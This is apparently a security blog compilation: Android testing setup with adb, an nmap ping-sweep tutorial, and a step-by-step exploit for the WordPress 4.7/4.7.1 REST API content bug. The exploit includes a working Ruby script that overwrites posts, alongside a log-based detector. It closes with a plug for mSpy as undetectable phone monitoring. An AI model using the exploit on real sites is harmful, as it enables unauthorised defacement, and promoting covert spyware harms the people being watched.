Android Mobile App Security Testing – Part 1

I am currently performing security testing of Android mobile apps and am documenting the whole process, including the tools and configuration steps needed, so that it may help someone starting fresh.

Step 1: Download Oracle VirtualBox


Step 2: Download and Install Kali Linux


Step 3: Download Genymotion Personal Use and Google Nexus Simulator

You need to register and login with an email address to use Genymotion.


In the Genymotion console, download the Google Nexus 6 image running Android 5.1 (API level 22). Before starting the Google Nexus simulator, click the three dots (…) next to it and choose Edit.

Install and Configure Genymotion Simulator


Under Network mode, choose the same network that Kali Linux is connected to (Bridge mode, shown below). In a later step we use the adb tool from Kali Linux to connect to the Android simulator over TCP, and that only works if both machines are reachable on the same network.

Genymotion Bridge mode


Step 4: Install ADB and Start Google Nexus

Android Debug Bridge (adb) is a versatile command-line tool that lets you communicate with a device (in our case, the Google Nexus simulator). The adb command facilitates a variety of device actions, such as installing and debugging apps, and gives you a shell on the device.

In Kali Linux, execute the following command to install adb.

# apt-get install adb

At this stage, also start the Google Nexus simulator: click the three dots (…) next to it in Genymotion and choose Start.


You need to find the IP address of your Android device: on the Google Nexus 6, navigate to Settings on the phone and look up the Wi-Fi IP address.

IP Address of Genymotion Android


Step 5: Connect to Android Google Nexus

In Kali Linux, issue the following command to connect to the device by its IP address. Replace the IP address with the one you noted on the phone.

# adb connect <device IP address>

If the adb server process is not already running, this starts it and binds it to local TCP port 5037. The server then locates emulator and device instances by scanning the odd-numbered ports in the range 5555 to 5585 (not random ports); when `adb connect` is given no port it uses 5555, which is the port the Genymotion device listens on.

Issue the following command to confirm that your host computer is connected to the target device; the device should be listed with the state `device` (not `offline` or `unauthorized`):

# adb devices

genymotion ADB Connect

You’re now good to go!

If the adb connection is ever a problem, make sure that your Kali Linux VM and the Genymotion device are connected to the same network (for example, both bridged onto the same Wi-Fi network).

Issue the following command if you want to reset your adb host:

adb kill-server

Then start over from the beginning of Step 5.
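As an added example (not part of the original article), the Python below wraps the Step 5 commands: it connects to the Genymotion device by IP and then checks the state that `adb devices` reports for that serial, because a device can show up as `offline` or `unauthorized` right after `adb connect` prints "connected to ...". It assumes an `adb` binary on the PATH; the sample listing is constructed so the parsing logic can be exercised without a device.

```python
import subprocess
import sys

ADB_PORT = 5555  # port adb assumes when `adb connect <ip>` is given no port

# Constructed sample of `adb devices` output: one usable device and one that
# accepted the TCP connection but never completed the adb handshake.
SAMPLE_LISTING = (
    "List of devices attached\n"
    "192.168.56.101:5555\tdevice\n"
    "192.168.56.102:5555\toffline\n"
)


def parse_adb_devices(listing):
    """Map serial -> state from `adb devices` output, skipping the header line."""
    states = {}
    for line in listing.splitlines()[1:]:
        parts = line.split()
        if len(parts) >= 2:
            states[parts[0]] = parts[1]
    return states


def device_is_ready(serial, listing):
    """Only the 'device' state means adb can run commands on the target;
    'offline' and 'unauthorized' entries are listed but every command fails."""
    return parse_adb_devices(listing).get(serial) == "device"


def connect_genymotion(ip, port=ADB_PORT, run=subprocess.run):
    """adb connect, then confirm the state via `adb devices` instead of
    trusting the 'connected to ...' message alone. `run` is injectable so the
    flow can be exercised without a real adb binary."""
    serial = f"{ip}:{port}"
    run(["adb", "connect", serial], check=True, capture_output=True, text=True)
    listing = run(["adb", "devices"], check=True, capture_output=True, text=True).stdout
    if not device_is_ready(serial, listing):
        state = parse_adb_devices(listing).get(serial, "missing")
        raise RuntimeError(f"{serial} is not usable (state: {state}); "
                           "check that Kali and Genymotion share a network, "
                           "then run `adb kill-server` and retry")
    return serial


if __name__ == "__main__":
    # usage: python3 connect.py <device IP address>
    print("ready:", connect_genymotion(sys.argv[1]))
```

An `offline` entry is the usual symptom of the two VMs sitting on different networks, which is why the error message points back to the network check and to `adb kill-server`.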

See you in Part 2 of this article.

PenTest Tool: Ping Sweep

A Ping Sweep is similar to Ping; the difference is the number of IP addresses scanned. Ping checks a single host or IP address, whereas a Ping Sweep scans a whole network or a large number of IP addresses to find out which hosts are live.

Both Ping and Ping Sweep send an ICMP echo request to each host and wait for an ICMP echo reply to determine whether the host is up.

Ping Sweep Tools:

nmap command:

The -sP option (now a deprecated alias for -sn) performs host discovery only, with no port scan, and reports which hosts are live.

c:\Tools\nmap-7.70>nmap.exe -sP
Starting Nmap 7.70 ( ) at 2018-12-01 11:41 Arab Standard Time
Nmap scan report for
Host is up (0.012s latency).
MAC Address: 4C:1F:CC:2B:04:C0 (Huawei Technologies)
Nmap scan report for
Host is up (0.033s latency).
MAC Address: 54:60:09:0D:2E:6E (Google)
Nmap scan report for
Host is up (0.043s latency).
MAC Address: 9A:FC:11:B6:6C:BA (Unknown)
Nmap scan report for
Host is up (0.081s latency).
MAC Address: C0:9F:05:65:13:99 (Guangdong Oppo Mobile Telecommunications)
Nmap scan report for
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 12.03 seconds


In networks where ICMP is blocked at a firewall, you cannot rely on the command above to determine host status. (Note that on your own subnet, as in the output above, Nmap discovers hosts with ARP requests rather than ICMP, which is why MAC addresses and vendors appear, so ICMP filtering only matters for targets beyond your local segment.) Instead, probe a port directly with a TCP SYN scan (-sS, which needs root or administrator privileges to send raw packets); add -Pn if you also want to skip the host discovery phase entirely.

c:\Tools\nmap-7.70>nmap -sS -p80
Starting Nmap 7.70 ( ) at 2018-12-01 12:07 Arab Standard Time
Nmap scan report for
Host is up (0.0048s latency).

80/tcp open http
MAC Address: 4C:1F:CC:2B:04:C0 (Huawei Technologies)

Nmap done: 1 IP address (1 host up) scanned in 4.45 seconds

GUI Tools: 

There are plenty of GUI tools that do a similar job; one of them is Ping Sweep.

The tool calls Nmap with the appropriate parameters to do the sweeping. Behind the scenes, Nmap sends multiple probes to the target systems to provoke responses that indicate the host is live:

  • ICMP echo requests (-PE)
  • TCP SYN on ports 80,443 (-PS80,443)
  • ICMP timestamp requests (-PP)
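Whether the sweep is run from the command line or from a GUI front-end, what you work with afterwards is the normal-format text shown above. As an added example (not from the original post or from Nmap), the Python below parses that format into a host list plus the scan summary, using constructed sample output that mirrors the two runs above (the IP addresses are invented; the MAC addresses are the ones printed on the page). It also picks out the entry Nmap reports as up with neither latency nor MAC address, which on a local-subnet sweep is normally the scanning machine itself, since Nmap cannot ARP-probe its own address.

```python
import re

# Per-host lines that Nmap's normal (default) output format prints.
HOST_RE = re.compile(r'^Nmap scan report for (?P<name>\S+)(?: \((?P<ip>[\d.]+)\))?$')
UP_RE = re.compile(r'^Host is up(?: \((?P<latency>[\d.]+)s latency\))?\.$')
MAC_RE = re.compile(r'^MAC Address: (?P<mac>[0-9A-Fa-f:]{17}) \((?P<vendor>[^)]*)\)$')
PORT_RE = re.compile(r'^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)')
DONE_RE = re.compile(r'^Nmap done: (?P<scanned>\d+) IP address(?:es)? \((?P<up>\d+) hosts? up\)')


def parse_nmap_normal(text):
    """Return (hosts, summary): one dict per 'Nmap scan report for' block and
    (addresses scanned, hosts up) from the 'Nmap done' line (None if absent)."""
    hosts, current, summary = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        m = HOST_RE.match(line)
        if m:
            current = {"ip": m.group("ip") or m.group("name"),
                       "name": m.group("name") if m.group("ip") else None,
                       "up": False, "latency": None, "mac": None,
                       "vendor": None, "ports": []}
            hosts.append(current)
            continue
        m = DONE_RE.match(line)
        if m:
            summary = (int(m.group("scanned")), int(m.group("up")))
            continue
        if current is None:
            continue  # banner lines before the first host block
        m = UP_RE.match(line)
        if m:
            current["up"] = True
            current["latency"] = float(m.group("latency")) if m.group("latency") else None
            continue
        m = MAC_RE.match(line)
        if m:
            current["mac"], current["vendor"] = m.group("mac").upper(), m.group("vendor")
            continue
        m = PORT_RE.match(line)
        if m:
            current["ports"].append((int(m.group("port")), m.group("proto"),
                                     m.group("state"), m.group("service")))
    return hosts, summary


def live_hosts(hosts):
    return [h["ip"] for h in hosts if h["up"]]


def scanner_self_entries(hosts):
    """Up with no latency and no MAC: on a LAN sweep, the scanning host itself."""
    return [h["ip"] for h in hosts if h["up"] and h["latency"] is None and h["mac"] is None]


# Constructed sample mirroring the `-sP` run above (IP addresses invented).
SAMPLE_SWEEP = """\
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-01 11:41 Arab Standard Time
Nmap scan report for 192.168.1.1
Host is up (0.012s latency).
MAC Address: 4C:1F:CC:2B:04:C0 (Huawei Technologies)
Nmap scan report for 192.168.1.23
Host is up (0.033s latency).
MAC Address: 54:60:09:0D:2E:6E (Google)
Nmap scan report for 192.168.1.40
Host is up (0.043s latency).
MAC Address: 9A:FC:11:B6:6C:BA (Unknown)
Nmap scan report for 192.168.1.77
Host is up (0.081s latency).
MAC Address: C0:9F:05:65:13:99 (Guangdong Oppo Mobile Telecommunications)
Nmap scan report for 192.168.1.100
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 12.03 seconds
"""

# Constructed sample mirroring the `-sS -p80` run above.
SAMPLE_SYN = """\
Nmap scan report for 192.168.1.1
Host is up (0.0048s latency).

PORT   STATE SERVICE
80/tcp open  http
MAC Address: 4C:1F:CC:2B:04:C0 (Huawei Technologies)

Nmap done: 1 IP address (1 host up) scanned in 4.45 seconds
"""

if __name__ == "__main__":
    hosts, summary = parse_nmap_normal(SAMPLE_SWEEP)
    print("live:", live_hosts(hosts), "summary:", summary)
    print("scanner itself:", scanner_self_entries(hosts))
```

For anything beyond a one-off sweep, prefer `nmap -oG -` (grepable) or `-oX` (XML) and parse those instead; the normal format is meant for humans and its wording can change between releases.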

WordPress REST API Exploit Step by Step

Vulnerability             : Unauthenticated Page/Post Content Modification via REST API
Vulnerable WP Versions    : 4.7 and 4.7.1
Vulnerability Description : If the website is not patched, an unauthenticated attacker can modify the content of any post or page on the WP site.
Patched Version           : 4.7.2
Additional Info           : The REST API infrastructure was added in WP 4.4 (released December 2015), but a plugin was still needed to expose the content endpoints. From WP 4.7 the content endpoints ship in core and are enabled by default. This vulnerability is in the REST API posts endpoint, so 4.7.0 and 4.7.1 are directly affected because the API is on by default.


In this demonstration, we show the exact steps to exploit WordPress websites running the vulnerable versions 4.7 and 4.7.1. The tool used here is the Advanced REST Client Chrome extension.


STEP 1: Find a Website Running WordPress

Google is your door: search for something similar to this and you will have plenty of WP websites on hand.

However, we are not going to try on any of those websites, of course I do not want to trouble someone or get into trouble as well. I am going to demonstrate on my local WordPress for you. And this is the page that we are going to change content without any authorization.



STEP 2: Identify the WP Version

View the page source of the website to identify the running WP version; a stock install prints it in the generator meta tag (`<meta name="generator" content="WordPress 4.7.1" />`). If the version is either 4.7 or 4.7.1, the website is vulnerable and you can proceed further.


STEP 3: Identify WP Post ID

Each post in WP is associated with a unique post ID, which is its reference. You can find it with the REST API client by requesting /wp-json/wp/v2/posts, which lists the posts together with their id fields. Here 3 is the post ID of the page shown in STEP 1.


STEP 4: Execute Now

You need to put your post ID in the API link; here I set my post ID 3 as ?id=3ABC and send a POST request with a JSON body carrying the new title and content. The reason this works: WordPress gives a query-string parameter precedence over the numeric id in the route, the permission check looks the post up with the string 3ABC, which PHP's is_numeric() rejects, so no post is found and the check is skipped, and the update code then casts the same value with (int), gets 3, and writes the attacker's title and content to post 3. Version 4.7.2 fixed this by validating that the id is numeric before any lookup.

And the page content is changed without any authentication!


Alternatively, you can use the following exploit code (Ruby, using the rest-client gem):

require 'rest-client'
require 'json'

puts "Enter Target URI (With wp directory)"
targeturi = gets.chomp
puts "Enter Post ID"
postid = gets.chomp.to_i

# POST to the core REST route for the post. The non-numeric "id" in the JSON
# body overrides the numeric route parameter and bypasses the permission check.
response = RestClient.post("#{targeturi}/wp-json/wp/v2/posts/#{postid}",
  {
    "id" => "#{postid}justrawdata",
    "title" => "You have been hacked",
    "content" => "Hacked please update your wordpress version"
  }.to_json,
  :content_type => :json,
  :accept => :json
) { |response, request, result| response }  # return the response instead of raising on non-2xx

if response.code == 200
  puts "Done! '#{targeturi}/index.php?p=#{postid}'"
else
  puts "This site is not Vulnerable"
end

source: exploit-db
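The request shape above, a write to a post's REST route whose `id` parameter starts with digits but is not numeric, is easy to pick out of web server logs. The following Python is an added example, not part of the original post and not WordPress code: it reproduces the two PHP coercions the bug hinges on (`is_numeric()` rejecting `3ABC` while `(int)` turns it into `3`) and uses them to flag exploit attempts in combined-format access log lines. The log lines are constructed and use RFC 5737 documentation addresses.

```python
import re
from urllib.parse import parse_qs, urlsplit

# PHP is_numeric(): optional sign, decimal digits, optional fraction/exponent.
_PHP_NUMERIC = re.compile(r'^\s*[+-]?(\d+\.?\d*|\.\d+)([eE][+-]?\d+)?$')
# PHP (int) cast on a string keeps the leading integer and drops the rest.
_PHP_INT_PREFIX = re.compile(r'^\s*([+-]?\d+)')


def php_is_numeric(value):
    return bool(_PHP_NUMERIC.match(value))


def php_int_cast(value):
    m = _PHP_INT_PREFIX.match(value)
    return int(m.group(1)) if m else 0


def is_bypass_id(value):
    """An id such as '3ABC' fails is_numeric(), so the vulnerable permission
    check finds no post and lets the request through, while the update code's
    (int) cast still resolves it to post 3."""
    return not php_is_numeric(value) and php_int_cast(value) > 0


_POSTS_ROUTE = re.compile(r'/wp-json/wp/v2/posts/(\d+)/?$')
_LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_request(method, target):
    """Return the post id a request would overwrite if it matches the exploit
    shape (write method, posts route, bypass-style id in the query), else None."""
    if method not in ("POST", "PUT", "PATCH"):
        return None
    parts = urlsplit(target)
    query = parse_qs(parts.query)
    route = parts.path
    # Without pretty permalinks the route travels as ?rest_route=/wp/v2/posts/7
    if "rest_route" in query:
        route = "/wp-json" + query["rest_route"][0]
    if not _POSTS_ROUTE.search(route):
        return None
    for candidate in query.get("id", []):
        if is_bypass_id(candidate):
            return php_int_cast(candidate)
    return None


def scan_access_log(lines):
    """Return (client ip, targeted post id, status) for every exploit-shaped request."""
    hits = []
    for line in lines:
        m = _LOG_LINE.match(line)
        if not m:
            continue
        post_id = classify_request(m.group("method"), m.group("target"))
        if post_id is not None:
            hits.append((m.group("ip"), post_id, int(m.group("status"))))
    return hits


# Constructed combined-format access log lines (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Dec/2018:12:07:41 +0300] "POST /wp-json/wp/v2/posts/3?id=3ABC HTTP/1.1" 200 1432',
    '192.0.2.11 - - [01/Dec/2018:12:08:02 +0300] "GET /wp-json/wp/v2/posts/3 HTTP/1.1" 200 2210',
    '192.0.2.12 - - [01/Dec/2018:12:09:15 +0300] "POST /wp-json/wp/v2/posts/3?id=3 HTTP/1.1" 401 97',
    '192.0.2.13 - - [01/Dec/2018:12:10:30 +0300] "POST /?rest_route=/wp/v2/posts/7&id=7justrawdata HTTP/1.1" 403 112',
]

if __name__ == "__main__":
    for ip, post_id, status in scan_access_log(SAMPLE_LOG):
        print(f"{ip} tried to overwrite post {post_id} (HTTP {status})")
```

A hit with a 2xx status means the overwrite went through; a non-2xx status means the request was refused, which is what you expect on a patched site. The Ruby exploit above sends the bad `id` in the JSON body rather than the query string, and access logs do not record request bodies, so catching that variant needs something that sees the body (a WAF rule or application-level logging). Either way, whether a host is exposed is answered by the version check in STEP 2, not by the absence of hits.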

Track your lost Android mobile phone – XtraSEC free android security

Today I found a fantastic piece of software to track your lost phone, and it is free: XtraSEC. There is a commercial version, but you can still perform most of the tasks with the free version.


Step 1: Use the Login button on the XtraSEC website to register with your Gmail account.

Step 2: Install the XtraSEC app on your Android phone.

Step 3: Log in to the app with the registered Gmail account, provide an alternate mobile phone number and grant the necessary permissions. (The alternate mobile phone number is needed to send commands to your lost phone via SMS.)

Step 4: Create a PIN so that no one can change the settings of this app if your phone is stolen.

I was amazed to read all the features provided by XtraSEC:

  • Get your phone's location, displayed in Google Maps.
  • Remotely capture a photo with your phone's camera, using either the front or the back camera. The captured photo is sent to your registered email address.
  • Remotely turn Wi-Fi and 3G off/on.
  • Remotely wipe the phone and memory card data.
  • Phone capture.

SMS Commands List

mSpy – track mobile phone calls, text messages and many more

mSpy lets you remotely track all activity that takes place on the monitored phone, from calls to calendar updates. Call history, text messages, emails, call recordings and more are sent from the tracked phone straight to your online account. mSpy claims that it is 100% undetectable.

You can look up the compatible phone models on their site: Android, iOS and BlackBerry.